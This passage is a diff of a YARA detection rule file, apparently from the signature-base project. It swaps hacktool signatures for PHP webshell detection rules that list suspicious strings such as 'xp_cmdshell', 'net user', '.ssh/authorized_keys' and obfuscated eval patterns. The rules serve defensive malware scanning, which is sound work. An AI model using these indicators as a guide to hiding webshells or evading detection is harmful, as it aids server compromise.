+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
+		$gen_much_sus93 = "eval(\"/*" wide ascii
+		$gen_much_sus94 = "=$_COOKIE;" wide ascii
+		$gif = { 47 49 46 38 }
 
 	condition:
-		all of them
+		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) or ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) ) and ( any of ( $cobfs* ) ) and ( filesize < 1KB or ( filesize < 3KB and ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) or #obf1 > 10 ) ) )
 }
-rule SIGNATURE_BASE_Proport_Zip_Folder_Proport
+rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Eval : FILE
 {
 	meta:
-		description = "Auto-generated rule on file ProPort.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "cd611f6c-42ed-5cd3-a6ab-7e0970925e61"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L377-L394"
+		description = "PHP webshell which eval()s another included file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "995fcc34-f91e-5c9c-97b1-84eed1714d40"
+		date = "2021-01-13"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1848-L1897"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
-		logic_hash = "0ee2ffc5ed243d170b8013b3a164a3719f43bd473f4af7e1a2697d88a298fe9f"
+		hash = "3a07e9188028efa32872ba5b6e5363920a6b2489"
+		hash = "ab771bb715710892b9513b1d075b4e2c0931afb6"
+		hash = "202dbcdc2896873631e1a0448098c820c82bcc8385a9f7579a0dc9702d76f580"
+		hash = "b51a6d208ec3a44a67cce16dcc1e93cdb06fe150acf16222815333ddf52d4db8"
+		logic_hash = "a7e9632c495e5d4cc883e2593c8ebe41cdf6a18b54bd6dfd3aec85352f19321c"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 46
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Corrupt Data!"
-		$s1 = "K4p~omkIz"
-		$s2 = "DllTrojanScan"
-		$s3 = "GetDllInfo"
-		$s4 = "Compressed by Petite (c)1999 Ian Luck."
-		$s5 = "GetFileCRC32"
-		$s6 = "GetTrojanNumber"
-		$s7 = "TFAKAbout"
+		$payload1 = "eval" fullword wide ascii
+		$payload2 = "assert" fullword wide ascii
+		$include1 = "$_FILE" wide ascii
+		$include2 = "include" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and 1 of ( $include* )
 }
-rule SIGNATURE_BASE_Stealthwasp_S_Basic_Portscanner_V1_2
+rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Tiny : FILE
 {
 	meta:
-		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "7f706186-f2e2-5d4d-951a-2ec8fc757cec"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L396-L407"
+		description = "Suspicious: Might be PHP webshell includer, check the included file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9bf96ddc-d984-57eb-9803-0b01890711b5"
+		date = "2021-04-17"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1899-L1944"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
-		logic_hash = "b01c165b5e5be3ba6905e8bc44a14c3d7195effd058e4c0c31678777d19db8b5"
+		hash = "0687585025f99596508783b891e26d6989eec2ba"
+		hash = "9e856f5cb7cb901b5003e57c528a6298341d04dc"
+		hash = "b3b0274cda28292813096a5a7a3f5f77378b8905205bda7bb7e1a679a7845004"
+		logic_hash = "e1efb6384009def30d845650fd0dd77319c3c7b4402cca074ca5c2a06372ab58"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 42
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "Basic PortScanner"
-		$s6 = "Now scanning port:"
+		$php_include1 = /include\(\$_(GET|POST|REQUEST)\[/ nocase wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 100 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $php_include* )
 }
-rule SIGNATURE_BASE_Bluesportscan
+rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic : FILE
 {
 	meta:
-		description = "Auto-generated rule on file BluesPortScan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "4bcb8b7c-5e22-5496-9a29-66e85e3c3395"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L409-L420"
+		description = "PHP webshell using function name from variable, e.g. $a='ev'.'al'; $a($code)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "58ad94bc-93c8-509c-9d3a-c9a26538d60c"
+		date = "2021-01-13"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1946-L2019"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6292f5fc737511f91af5e35643fc9eef"
-		logic_hash = "5cb4e4b87eaf166c85d23114f5abc10ef83b4a29968bf6fef4b3fce7ff2787fd"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "65dca1e652d09514e9c9b2e0004629d03ab3c3ef"
+		hash = "b8ab38dc75cec26ce3d3a91cb2951d7cdd004838"
+		hash = "c4765e81550b476976604d01c20e3dbd415366df"
+		hash = "2e11ba2d06ebe0aa818e38e24a8a83eebbaae8877c10b704af01bf2977701e73"
+		logic_hash = "c49434662defad4945639887f4a6537c44a5559f83646f378f848b4aa4ba3c3f"
+		score = 60
+		quality = -156
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "This program was made by Volker Voss"
-		$s1 = "JiBOo~SSB"
+		$pd_fp1 = "whoops_add_stack_frame" wide ascii
+		$pd_fp2 = "new $ec($code, $mode, $options, $userinfo);" wide ascii
+		$pd_fp3 = "($i)] = 600;" ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
+		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
+		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
+		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
+		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
+		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
+		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
+		$dynamic8 = /\$\{[^}]{1,20}}(\[[^\]]{1,20}\])?\(\$\{/ wide ascii
+		$fp1 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 24 63 29 3B }
+		$fp2 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 2E 2E 2E 20 24 63 29 3B }
+		$fp3 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 74 61 74 69 63 3A 3A 24 62 28 29 3B}
+		$fp4 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 65 6C 66 3A 3A 24 62 28 29 3B }
+		$fp5 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 5C 22 7B 24 76 61 72 43 61 6C 6C 61 62 6C 65 28 29 7D 5C 22 3B }
+		$fp6 = "// TODO error about missing expression"
+		$fp7 = "// This is an invalid location for an attribute, "
+		$fp8 = "/* Auto-generated from php/php-langspec tests */"
+		$fp_dynamic1 = /"\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
 
 	condition:
-		all of them
+		filesize > 20 and filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $dynamic* ) ) and not any of ( $pd_fp* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Scanarator_Iis
+
+rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic_Big : FILE
 {
 	meta:
-		description = "Auto-generated rule on file iis.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "a467147b-53c8-53db-aa33-5f0e4e066988"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L422-L433"
+		description = "PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a5caab93-7b94-59d7-bbca-f9863e81b9e5"
+		date = "2021-02-07"
+		modified = "2024-02-23"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2021-L2338"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
-		logic_hash = "092cb902e10624b207b7932e6b3c1fe2277ed1d183e5de9ee4d07d8548e90ab6"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "6559bfc4be43a55c6bb2bd867b4c9b929713d3f7f6de8111a3c330f87a9b302c"
+		hash = "9e82c9c2fa64e26fd55aa18f74759454d89f968068d46b255bd4f41eb556112e"
+		hash = "6def5296f95e191a9c7f64f7d8ac5c529d4a4347ae484775965442162345dc93"
+		hash = "dadfdc4041caa37166db80838e572d091bb153815a306c8be0d66c9851b98c10"
+		hash = "0a4a292f6e08479c04e5c4fdc3857eee72efa5cd39db52e4a6e405bf039928bd"
+		hash = "4326d10059e97809fb1903eb96fd9152cc72c376913771f59fa674a3f110679e"
+		hash = "b49d0f942a38a33d2b655b1c32ac44f19ed844c2479bad6e540f69b807dd3022"
+		hash = "575edeb905b434a3b35732654eedd3afae81e7d99ca35848c509177aa9bf9eef"
+		hash = "ee34d62e136a04e2eaf84b8daa12c9f2233a366af83081a38c3c973ab5e2c40f"
+		logic_hash = "9e033789ab2f3d28bf48d8102edf51daf84a1d61d50cd59f3810be7c07a8e8d9"
+		score = 50
+		quality = -336
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "example: iis 10.10.10.10"
-		$s1 = "send error"
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$new_php2 = "<?php" nocase wide ascii
+		$new_php3 = "<script language=\"php" nocase wide ascii
+		$php_short = "<?"
+		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
+		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
+		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
+		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
+		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
+		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
+		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
+		$dynamic8 = "eval(" wide ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus27 = "zuncomp" wide ascii
+		$gen_bit_sus28 = "ase6" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus65 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_bit_sus99 = "$password = " wide ascii
+		$gen_bit_sus100 = "();$" wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "DEFACE" fullword wide ascii
+		$gen_much_sus93 = "Bypass" fullword wide ascii
+		$gen_much_sus94 = /eval\s{2,20}\(/ nocase wide ascii
+		$gen_much_sus100 = "rot13" wide ascii
+		$gen_much_sus101 = "ini_set('error_log'" wide ascii
+		$gen_much_sus102 = "base64_decode(base64_decode(" wide ascii
+		$gen_much_sus103 = "=$_COOKIE;" wide ascii
+		$gen_much_sus104 = { C0 A6 7B 3? 7D 2E 24 }
+		$gen_much_sus105 = "$GLOBALS[\"__" wide ascii
+		$gen_much_sus106 = ")-0)" wide ascii
+		$gen_much_sus107 = "-0)+" wide ascii
+		$gen_much_sus108 = "+0)+" wide ascii
+		$gen_much_sus109 = "+(0/" wide ascii
+		$gen_much_sus110 = "+(0+" wide ascii
+		$gen_much_sus111 = "extract($_REQUEST)" wide ascii
+		$gen_much_sus112 = "<?php\t\t\t\t\t\t\t\t\t\t\t" wide ascii
+		$gen_much_sus113 = "\t\t\t\t\t\t\t\t\t\t\textract" wide ascii
+		$gen_much_sus114 = "\" .\"" wide ascii
+		$gen_much_sus115 = "end($_POST" wide ascii
+		$weevely1 = /';\n\$\w\s?=\s?'/ wide ascii
+		$weevely2 = /';\x0d\n\$\w\s?=\s?'/ wide ascii
+		$weevely3 = /';\$\w{1,2}='/ wide ascii
+		$weevely4 = "str_replace" fullword wide ascii
+		$gif = { 47 49 46 38 }
+		$fp1 = "# Some examples from obfuscated malware:" ascii
+		$fp2 = "* @package   PHP_CodeSniffer" ascii
+		$fp3 = ".jQuery===" ascii
+		$fp4 = "* @param string $lstat encoded LStat string" ascii
 
 	condition:
-		all of them
+		not ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x3c3f786d or uint32be( 0 ) == 0x3c3f584d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 or 1 of ( $fp* ) ) and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $dynamic* ) ) and ( $gif at 0 or ( ( filesize < 1KB and ( 1 of ( $gen_much_sus* ) ) ) or ( filesize < 2KB and ( ( #weevely1 + #weevely2 + #weevely3 ) > 2 and #weevely4 > 1 ) ) or ( filesize < 4000 and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 3 of ( $gen_much_sus* ) or 5 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 3 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 160KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) or ( math.deviation ( 500 , filesize -500 , 89.0 ) > 70 ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) or #gen_much_sus104 > 4 ) ) ) or ( filesize > 2KB and filesize < 1MB and ( ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) ) ) )
 }
-rule SIGNATURE_BASE_Stealth_Stealth
+
+rule SIGNATURE_BASE_WEBSHELL_PHP_Encoded_Big : FILE
 {
 	meta:
-		description = "Auto-generated rule on file Stealth.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "5f45882e-3e27-596d-8725-fad380e1c297"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L435-L446"
+		description = "PHP webshell using some kind of eval with encoded blob to decode, which is checked with YARAs math.entropy module"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c3bb7b8b-c554-5802-8955-c83722498f8b"
+		date = "2021-02-07"
+		modified = "2024-12-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2340-L2426"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
-		logic_hash = "e210b1a553549c22f66511dfc9d0d3f5b17f02981b9e9915827bc909f34b3262"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "1d4b374d284c12db881ba42ee63ebce2759e0b14"
+		hash = "fc0086caee0a2cd20609a05a6253e23b5e3245b8"
